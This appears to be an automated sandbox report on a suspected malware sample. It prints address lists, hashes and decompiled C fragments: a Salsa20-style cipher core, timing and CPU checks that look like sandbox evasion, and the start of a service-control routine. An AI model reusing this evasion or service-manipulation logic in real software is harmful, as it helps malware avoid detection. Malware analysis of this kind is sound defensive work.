                                                                                                                                                            0x009c8f06
                                                                                                                                                            0x009c8f4a
                                                                                                                                                            0x009c8f4d
                                                                                                                                                            0x009c8f50
                                                                                                                                                            0x009c8f55
                                                                                                                                                            0x009c8f57
                                                                                                                                                            0x009c8f5d
                                                                                                                                                            0x009c8f60
                                                                                                                                                            0x009c8f67
                                                                                                                                                            0x009c8f6a
                                                                                                                                                            0x009c8f6d
                                                                                                                                                            0x009c8f70
                                                                                                                                                            0x009c8fba
                                                                                                                                                            0x009c8fc0
                                                                                                                                                            0x009c8fc2
                                                                                                                                                            0x009c8fc8
                                                                                                                                                            0x009c8fca
                                                                                                                                                            0x009c8fcd
                                                                                                                                                            0x009c8fd3
                                                                                                                                                            0x009c8fd5
                                                                                                                                                            0x009c8fdd
                                                                                                                                                            0x009c8fe3
                                                                                                                                                            0x009c8fe6
                                                                                                                                                            0x009c8fe9
                                                                                                                                                            0x009c8ff4
                                                                                                                                                            0x009c8cec
                                                                                                                                                            0x009c8cec
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c8cec
                                                                                                                                                            0x009c8d89
                                                                                                                                                            0x009c8d8b
                                                                                                                                                            0x009c8d90
                                                                                                                                                            0x009c8d92
                                                                                                                                                            0x009c8d95
                                                                                                                                                            0x009c8d98
                                                                                                                                                            0x009c8d9a
                                                                                                                                                            0x009c8d9d
                                                                                                                                                            0x009c8da2
                                                                                                                                                            0x009c8da5
                                                                                                                                                            0x009c8da8
                                                                                                                                                            0x009c8dab
                                                                                                                                                            0x009c8dab
                                                                                                                                                            0x009c8dae
                                                                                                                                                            0x009c8dae
                                                                                                                                                            0x009c8db1
                                                                                                                                                            0x009c8db6
                                                                                                                                                            0x009c8db8
                                                                                                                                                            0x009c8dbb
                                                                                                                                                            0x009c8dbb
                                                                                                                                                            0x009c8e0c
                                                                                                                                                            0x009c8e0e
                                                                                                                                                            0x009c8e11
                                                                                                                                                            0x009c8e17
                                                                                                                                                            0x009c8e19
                                                                                                                                                            0x009c8e1f
                                                                                                                                                            0x009c8e21
                                                                                                                                                            0x009c8e29
                                                                                                                                                            0x009c8e2c
                                                                                                                                                            0x009c8e38
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c8e38
                                                                                                                                                            0x009c8c54
                                                                                                                                                            0x009c8c56
                                                                                                                                                            0x009c8c58
                                                                                                                                                            0x009c8c5b
                                                                                                                                                            0x009c8c5e
                                                                                                                                                            0x009c8c61
                                                                                                                                                            0x009c8c65
                                                                                                                                                            0x009c8c6a
                                                                                                                                                            0x009c8c6d
                                                                                                                                                            0x009c8c72
                                                                                                                                                            0x009c8c72
                                                                                                                                                            0x009c8c72
                                                                                                                                                            0x009c8cc3
                                                                                                                                                            0x009c8cc5
                                                                                                                                                            0x009c8cc8
                                                                                                                                                            0x009c8ccd
                                                                                                                                                            0x009c8ccf
                                                                                                                                                            0x009c8cd5
                                                                                                                                                            0x009c8cd7
                                                                                                                                                            0x009c8cdf
                                                                                                                                                            0x009c8ce2
                                                                                                                                                            0x009c8cea
                                                                                                                                                            0x00000000

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 676d78977afd79957d6ff89ba78857d48d46adff626b0df1da486a8c6bff1063
                                                                                                                                                            • Instruction ID: 6507472469cf9189b70b003bf55df0e42c9281bfa11492d3b58c309a5d862de0
                                                                                                                                                            • Opcode Fuzzy Hash: 676d78977afd79957d6ff89ba78857d48d46adff626b0df1da486a8c6bff1063
                                                                                                                                                            • Instruction Fuzzy Hash: C3D12972B246518FD328CF2DDC90A26B7E1EB8C301745893DE49AC7359DB39E911EB90
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C83FF, Relevance: .2, Instructions: 221COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 69%
                                                                                                                                                            			E009C83FF(void* _a4, void* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				char _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				void _v120;
				signed int _t167;
				signed int _t198;
				signed int _t200;
				signed int _t206;
				signed int _t210;
				signed int _t216;
				signed int _t218;
				signed int _t229;
				signed int _t230;
				void* _t232;
				signed int _t233;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t245;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t269;
				signed int _t270;
				void* _t272;

				_t233 = 0x10;
				_v56 = 0xa;
				memcpy( &_v120, _a8, _t233 << 2);
				_t245 = _v72;
				_t235 = _v60;
				_t239 = _v64;
				_t269 = _v68;
				_t229 = _v76;
				_v8 = _v80;
				_v36 = _v84;
				_v24 = _v88;
				_v48 = _v92;
				_v44 = _v96;
				_v32 = _v100;
				_v20 = _v104;
				_v40 = _v108;
				_v16 = _v112;
				_v12 = _v116;
				_t167 = _v120;
				_v52 = _t245;
				_v28 = _t167;
				do {
					asm("rol eax, 0x7");
					_v20 = _v20 ^ _t167 + _t245;
					asm("rol eax, 0x9");
					_v24 = _v24 ^ _v20 + _v28;
					asm("rol eax, 0xd");
					_t247 = _v52 ^ _v24 + _v20;
					_v52 = _t247;
					asm("rol eax, 0x12");
					_v28 = _v28 ^ _v24 + _t247;
					asm("rol eax, 0x7");
					_v36 = _v36 ^ _v12 + _v32;
					asm("rol eax, 0x9");
					_t270 = _t269 ^ _v36 + _v32;
					_t248 = _v44;
					asm("rol eax, 0xd");
					_v12 = _v12 ^ _v36 + _t270;
					asm("rol eax, 0x12");
					_v32 = _v32 ^ _v12 + _t270;
					asm("rol eax, 0x7");
					_t240 = _t239 ^ _v8 + _t248;
					asm("rol eax, 0x9");
					_v16 = _v16 ^ _v8 + _t240;
					asm("rol eax, 0xd");
					_t249 = _t248 ^ _v16 + _t240;
					_v44 = _t249;
					asm("rol eax, 0x12");
					_v8 = _v8 ^ _v16 + _t249;
					asm("rol eax, 0x7");
					_t251 = _v40 ^ _t229 + _t235;
					_v40 = _t251;
					asm("rol eax, 0x9");
					_t253 = _v48 ^ _t251 + _t235;
					_v48 = _t253;
					asm("rol eax, 0xd");
					_t230 = _t229 ^ _v40 + _t253;
					asm("rol eax, 0x12");
					_t236 = _t235 ^ _t253 + _t230;
					asm("rol eax, 0x7");
					_v12 = _v12 ^ _v28 + _v40;
					_t198 = _v12;
					_v116 = _t198;
					asm("rol eax, 0x9");
					_v16 = _v16 ^ _t198 + _v28;
					_t200 = _v16;
					_v112 = _t200;
					asm("rol eax, 0xd");
					_t255 = _v40 ^ _t200 + _v12;
					_v40 = _t255;
					asm("rol eax, 0x12");
					_v108 = _t255;
					_t257 = _v28 ^ _v16 + _t255;
					asm("rol eax, 0x7");
					_v44 = _v44 ^ _v32 + _v20;
					_t206 = _v44;
					_v96 = _t206;
					asm("rol eax, 0x9");
					_v28 = _t257;
					_v120 = _t257;
					_t259 = _v48 ^ _t206 + _v32;
					_v48 = _t259;
					asm("rol eax, 0xd");
					_v20 = _v20 ^ _v44 + _t259;
					_t210 = _v20;
					_v104 = _t210;
					asm("rol eax, 0x12");
					_v92 = _t259;
					_t261 = _v32 ^ _t210 + _t259;
					_v32 = _t261;
					_v100 = _t261;
					_t262 = _v36;
					asm("rol eax, 0x7");
					_t229 = _t230 ^ _v8 + _t262;
					asm("rol eax, 0x9");
					_v24 = _v24 ^ _v8 + _t229;
					_t216 = _v24;
					_v88 = _t216;
					asm("rol eax, 0xd");
					_t263 = _t262 ^ _t216 + _t229;
					_t218 = _t263;
					_v36 = _t263;
					_v84 = _t218;
					asm("rol eax, 0x12");
					_v8 = _v8 ^ _t218 + _v24;
					_v80 = _v8;
					asm("rol eax, 0x7");
					_t245 = _v52 ^ _t236 + _t240;
					_v52 = _t245;
					_v72 = _t245;
					asm("rol eax, 0x9");
					_t269 = _t270 ^ _t236 + _t245;
					asm("rol eax, 0xd");
					_t239 = _t240 ^ _t269 + _t245;
					asm("rol eax, 0x12");
					_t235 = _t236 ^ _t239 + _t269;
					_t134 =  &_v56;
					 *_t134 = _v56 - 1;
					_t167 = _v28;
				} while ( *_t134 != 0);
				_v76 = _t229;
				_v64 = _t239;
				_t241 = 0;
				_v60 = _t235;
				_t232 = _a8 -  &_v120;
				_v68 = _t269;
				do {
					 *((intOrPtr*)(_t272 + _t241 * 4 - 0x74)) =  *((intOrPtr*)(_t272 + _t241 * 4 - 0x74)) +  *((intOrPtr*)(_t272 + _t232 + _t241 * 4 - 0x74));
					_t241 = _t241 + 1;
				} while (_t241 < 0x10);
				_t237 = 0x10;
				return memcpy(_a4,  &_v120, _t237 << 2);
			}
































































                                                                                                                                                            0x009c840d
                                                                                                                                                            0x009c8411
                                                                                                                                                            0x009c8418
                                                                                                                                                            0x009c841d
                                                                                                                                                            0x009c8420
                                                                                                                                                            0x009c8423
                                                                                                                                                            0x009c8426
                                                                                                                                                            0x009c8429
                                                                                                                                                            0x009c842c
                                                                                                                                                            0x009c8432
                                                                                                                                                            0x009c8438
                                                                                                                                                            0x009c843e
                                                                                                                                                            0x009c8444
                                                                                                                                                            0x009c844a
                                                                                                                                                            0x009c8450
                                                                                                                                                            0x009c8456
                                                                                                                                                            0x009c845c
                                                                                                                                                            0x009c8462
                                                                                                                                                            0x009c8465
                                                                                                                                                            0x009c8468
                                                                                                                                                            0x009c846b
                                                                                                                                                            0x009c846e
                                                                                                                                                            0x009c8473
                                                                                                                                                            0x009c8476
                                                                                                                                                            0x009c847f
                                                                                                                                                            0x009c8482
                                                                                                                                                            0x009c848b
                                                                                                                                                            0x009c848e
                                                                                                                                                            0x009c8495
                                                                                                                                                            0x009c8498
                                                                                                                                                            0x009c849b
                                                                                                                                                            0x009c84a4
                                                                                                                                                            0x009c84a7
                                                                                                                                                            0x009c84b0
                                                                                                                                                            0x009c84b3
                                                                                                                                                            0x009c84b5
                                                                                                                                                            0x009c84bd
                                                                                                                                                            0x009c84c0
                                                                                                                                                            0x009c84c8
                                                                                                                                                            0x009c84cb
                                                                                                                                                            0x009c84d3
                                                                                                                                                            0x009c84d6
                                                                                                                                                            0x009c84dd
                                                                                                                                                            0x009c84e0
                                                                                                                                                            0x009c84e8
                                                                                                                                                            0x009c84eb
                                                                                                                                                            0x009c84f2
                                                                                                                                                            0x009c84f8
                                                                                                                                                            0x009c84fb
                                                                                                                                                            0x009c8501
                                                                                                                                                            0x009c8504
                                                                                                                                                            0x009c8506
                                                                                                                                                            0x009c850f
                                                                                                                                                            0x009c8512
                                                                                                                                                            0x009c8519
                                                                                                                                                            0x009c851c
                                                                                                                                                            0x009c851f
                                                                                                                                                            0x009c8524
                                                                                                                                                            0x009c8527
                                                                                                                                                            0x009c852f
                                                                                                                                                            0x009c8532
                                                                                                                                                            0x009c8535
                                                                                                                                                            0x009c8538
                                                                                                                                                            0x009c853e
                                                                                                                                                            0x009c8541
                                                                                                                                                            0x009c8544
                                                                                                                                                            0x009c8547
                                                                                                                                                            0x009c854d
                                                                                                                                                            0x009c8553
                                                                                                                                                            0x009c855a
                                                                                                                                                            0x009c855d
                                                                                                                                                            0x009c8560
                                                                                                                                                            0x009c8566
                                                                                                                                                            0x009c856e
                                                                                                                                                            0x009c8571
                                                                                                                                                            0x009c8574
                                                                                                                                                            0x009c8577
                                                                                                                                                            0x009c857d
                                                                                                                                                            0x009c8580
                                                                                                                                                            0x009c8583
                                                                                                                                                            0x009c8589
                                                                                                                                                            0x009c8590
                                                                                                                                                            0x009c8593
                                                                                                                                                            0x009c8596
                                                                                                                                                            0x009c8599
                                                                                                                                                            0x009c859c
                                                                                                                                                            0x009c85a1
                                                                                                                                                            0x009c85a4
                                                                                                                                                            0x009c85aa
                                                                                                                                                            0x009c85af
                                                                                                                                                            0x009c85b2
                                                                                                                                                            0x009c85b5
                                                                                                                                                            0x009c85ba
                                                                                                                                                            0x009c85bd
                                                                                                                                                            0x009c85c4
                                                                                                                                                            0x009c85c7
                                                                                                                                                            0x009c85ca
                                                                                                                                                            0x009c85cd
                                                                                                                                                            0x009c85d2
                                                                                                                                                            0x009c85d5
                                                                                                                                                            0x009c85d7
                                                                                                                                                            0x009c85d9
                                                                                                                                                            0x009c85df
                                                                                                                                                            0x009c85e5
                                                                                                                                                            0x009c85e8
                                                                                                                                                            0x009c85ee
                                                                                                                                                            0x009c85f4
                                                                                                                                                            0x009c85f7
                                                                                                                                                            0x009c85f9
                                                                                                                                                            0x009c85fc
                                                                                                                                                            0x009c8602
                                                                                                                                                            0x009c8605
                                                                                                                                                            0x009c860a
                                                                                                                                                            0x009c860d
                                                                                                                                                            0x009c8612
                                                                                                                                                            0x009c8615
                                                                                                                                                            0x009c8617
                                                                                                                                                            0x009c8617
                                                                                                                                                            0x009c861b
                                                                                                                                                            0x009c861b
                                                                                                                                                            0x009c8624
                                                                                                                                                            0x009c862d
                                                                                                                                                            0x009c8630
                                                                                                                                                            0x009c8632
                                                                                                                                                            0x009c8635
                                                                                                                                                            0x009c8637
                                                                                                                                                            0x009c863a
                                                                                                                                                            0x009c8641
                                                                                                                                                            0x009c8645
                                                                                                                                                            0x009c8646
                                                                                                                                                            0x009c8653
                                                                                                                                                            0x009c865c

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 94389a93e62d7c07f5c1ac272210a142c76ffef6fb536e77bacda6aa42c1b665
                                                                                                                                                            • Instruction ID: a712ea0afbb79ac16a46be5bc38ef81d99a6b9ee38f56e5a42c92859f6af8c60
                                                                                                                                                            • Opcode Fuzzy Hash: 94389a93e62d7c07f5c1ac272210a142c76ffef6fb536e77bacda6aa42c1b665
                                                                                                                                                            • Instruction Fuzzy Hash: B3A17CB6D002099FCF80CFA9C981ADEFBF5FF88254F24416AD414F7211E274AA558F54
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C585D, Relevance: .1, Instructions: 75COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                            			E009C585D(signed char __eax, signed int __edx, signed char* _a4) {
				void* _v5;
				signed char _v12;
				signed char _v20;
				signed char _t11;
				void* _t12;
				void* _t14;
				signed char _t19;
				void* _t23;
				signed char _t25;
				signed char _t28;
				signed int _t29;
				signed int _t31;
				signed char _t32;
				signed int _t34;
				void* _t36;
				signed int _t38;
				signed int _t40;
				void* _t42;

				_t29 = __edx;
				_t11 = __eax;
				_t23 = 0;
				do {
					asm("rdtsc");
					_t32 = _t11;
					_t12 = E009C5907();
					asm("rdtsc");
					_v20 = _t12 - _t32;
					asm("sbb ecx, edi");
					_v12 = _t29;
					_t14 = E009C5907();
					_t25 = _v20;
					asm("rdtsc");
					asm("sbb edx, [ebp-0x8]");
					_t11 = _t14 - _t25 - _t32;
					_v20 = _t11;
					asm("sbb edx, edi");
					_t31 = _v12;
					_t38 = _t31;
					if(_t38 <= 0 && (_t38 < 0 || _t25 <= 0xffffffff)) {
						_t40 = _t29;
						if(_t40 <= 0 && (_t40 < 0 || _t11 <= 0xffffffff)) {
							_t34 = _t25 - _t11;
							asm("sbb edi, edx");
							asm("cdq");
							_t11 = _t31 ^ _t29;
							_t36 = (_t34 ^ _t29) - _t29;
							_t42 = _t36;
							asm("sbb eax, edx");
							_v12 = _t11;
							if(_t42 >= 0 && (_t42 > 0 || _t36 >= 0x40)) {
								_v5 = E009C5791(_t25);
								_t19 = E009C5791(_v20);
								_t28 = _v5;
								_t11 = _t19 ^ _t28;
								if(_t11 != 0) {
									 *_a4 = _t28;
									return 1;
								}
							}
						}
					}
					_t23 = _t23 + 1;
				} while (_t23 < 0x80);
				return 0;
			}





















                                                                                                                                                            0x009c585d
                                                                                                                                                            0x009c585d
                                                                                                                                                            0x009c5866
                                                                                                                                                            0x009c5868
                                                                                                                                                            0x009c5868
                                                                                                                                                            0x009c586a
                                                                                                                                                            0x009c586e
                                                                                                                                                            0x009c5873
                                                                                                                                                            0x009c5879
                                                                                                                                                            0x009c587c
                                                                                                                                                            0x009c587e
                                                                                                                                                            0x009c5881
                                                                                                                                                            0x009c5886
                                                                                                                                                            0x009c5889
                                                                                                                                                            0x009c588d
                                                                                                                                                            0x009c5890
                                                                                                                                                            0x009c5892
                                                                                                                                                            0x009c5895
                                                                                                                                                            0x009c5897
                                                                                                                                                            0x009c589a
                                                                                                                                                            0x009c589c
                                                                                                                                                            0x009c58a5
                                                                                                                                                            0x009c58a7
                                                                                                                                                            0x009c58b2
                                                                                                                                                            0x009c58b4
                                                                                                                                                            0x009c58b8
                                                                                                                                                            0x009c58b9
                                                                                                                                                            0x009c58bd
                                                                                                                                                            0x009c58bd
                                                                                                                                                            0x009c58bf
                                                                                                                                                            0x009c58c1
                                                                                                                                                            0x009c58c4
                                                                                                                                                            0x009c58d6
                                                                                                                                                            0x009c58d9
                                                                                                                                                            0x009c58e0
                                                                                                                                                            0x009c58e3
                                                                                                                                                            0x009c58e5
                                                                                                                                                            0x009c5900
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c5904
                                                                                                                                                            0x009c58e5
                                                                                                                                                            0x009c58c4
                                                                                                                                                            0x009c58a7
                                                                                                                                                            0x009c58e7
                                                                                                                                                            0x009c58e8
                                                                                                                                                            0x00000000

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: time$Time$BeginPeriodSleep
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4118631919-0
                                                                                                                                                            • Opcode ID: fc29b22b782b8560c203740e77577da81cb83bbd114b6084b10493fc8158ca25
                                                                                                                                                            • Instruction ID: d7f2355037f86e0e65aec7caf5905ad7e78a6ce3ac6c19c933630defb84ba35c
                                                                                                                                                            • Opcode Fuzzy Hash: fc29b22b782b8560c203740e77577da81cb83bbd114b6084b10493fc8158ca25
                                                                                                                                                            • Instruction Fuzzy Hash: 62110B35E10AA45B9F18AE7C4840F9DBBF6DFC5760B2B877DE828D3180D571A8C44A52
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C4B58, Relevance: .0, Instructions: 41COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 62%
                                                                                                                                                            			E009C4B58(intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v28;
				intOrPtr _t13;
				intOrPtr* _t17;
				intOrPtr* _t24;

				_t13 = 0;
				_v8 = 0;
				_v12 = _a4;
				do {
					_push(_t17);
					asm("cpuid");
					_t24 = _t17;
					_t17 =  &_v28;
					 *_t17 = _t13 + 0x80000002;
					 *((intOrPtr*)(_t17 + 4)) = _t24;
					_t13 = _v8 + 1;
					 *((intOrPtr*)(_t17 + 8)) = 0;
					 *((intOrPtr*)(_t17 + 0xc)) = __edx;
					_v8 = _t13;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v12 = _v12 + 0x10;
				} while (_t13 < 3);
				return _a4;
			}









                                                                                                                                                            0x009c4b64
                                                                                                                                                            0x009c4b66
                                                                                                                                                            0x009c4b69
                                                                                                                                                            0x009c4b6c
                                                                                                                                                            0x009c4b73
                                                                                                                                                            0x009c4b74
                                                                                                                                                            0x009c4b76
                                                                                                                                                            0x009c4b79
                                                                                                                                                            0x009c4b7c
                                                                                                                                                            0x009c4b81
                                                                                                                                                            0x009c4b84
                                                                                                                                                            0x009c4b85
                                                                                                                                                            0x009c4b8a
                                                                                                                                                            0x009c4b8d
                                                                                                                                                            0x009c4b90
                                                                                                                                                            0x009c4b91
                                                                                                                                                            0x009c4b92
                                                                                                                                                            0x009c4b93
                                                                                                                                                            0x009c4b9a
                                                                                                                                                            0x009c4b9d
                                                                                                                                                            0x009c4bab

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 47c376b581d24c7d1e1a0f35ff1822e68f57d00c0a892bdfc065d503b3469f08
                                                                                                                                                            • Instruction ID: ff1aa343a29f2be42e35cd93a076d1569af93059654c32eb191b24d238f8a3a3
                                                                                                                                                            • Opcode Fuzzy Hash: 47c376b581d24c7d1e1a0f35ff1822e68f57d00c0a892bdfc065d503b3469f08
                                                                                                                                                            • Instruction Fuzzy Hash: 29F012B1D01208AFCB45CF5DD88569EFBF5EF49264F2581AAEC08EB301D2719E408BD0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C5387, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C5387() {

				return ( *( *[fs:0x30] + 0xa4) & 0x000000ff) << 0x00000008 |  *( *[fs:0x30] + 0xa8) & 0x000000ff;
			}



                                                                                                                                                            0x009c53a3

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 509f6a94fdf042510e336dd1cc9cd65acd2f16b80682f34016c6142793c3d862
                                                                                                                                                            • Instruction ID: 2f92208e2cd7eb6c465aa2c1d9d9ad2e0d5e4d52fdcf87f58a77acdaf95c176a
                                                                                                                                                            • Opcode Fuzzy Hash: 509f6a94fdf042510e336dd1cc9cd65acd2f16b80682f34016c6142793c3d862
                                                                                                                                                            • Instruction Fuzzy Hash: 15B092682066D149C396621582B83B07FA0EB83556F2800FD94EB0E883855E021BDB11
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C4FB9, Relevance: .0, Instructions: 2COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C4FB9() {

				return  *[fs:0x30];
			}



                                                                                                                                                            0x009c4fbf

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                            • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                                                            • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C5A21, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 143serviceCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                            			E009C5A21(void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags, char _a4) {
				int _v8;
				char _v12;
				char _v16;
				char _v20;
				void _v44;
				struct _SERVICE_STATUS _v48;
				char _v116;
				char _v6796;
				void* _t25;
				void* _t26;
				long _t41;
				void* _t42;
				int _t57;
				void* _t58;
				signed int _t61;
				int _t66;
				void* _t68;
				long* _t73;
				void* _t74;
				void* _t75;

				E009CC600();
				_t66 = 0;
				E009C4832( &_v116, 0, 0x42);
				_t75 = _t74 + 0xc;
				_t25 = E009C5387();
				_t77 = _t25 - 0x600;
				if(_t25 < 0x600 || E009C5C11(__edx, _t77) == 0) {
					L22:
					_t26 = 0;
					__eflags = 0;
					goto L23;
				} else {
					 *0x9d1d80 = OpenSCManagerW(0, L"ServicesActive", 4);
					_push( &_v116);
					_push(0);
					_push(0x9d0f7c);
					if( *0x9d1124() != 0) {
						goto L22;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push( &_a4);
					_push(1);
					_push( *0x9d0f7c);
					if( *0x9d10c8() != 0) {
						goto L22;
					}
					_v12 = 0xa;
					_push( &_v16);
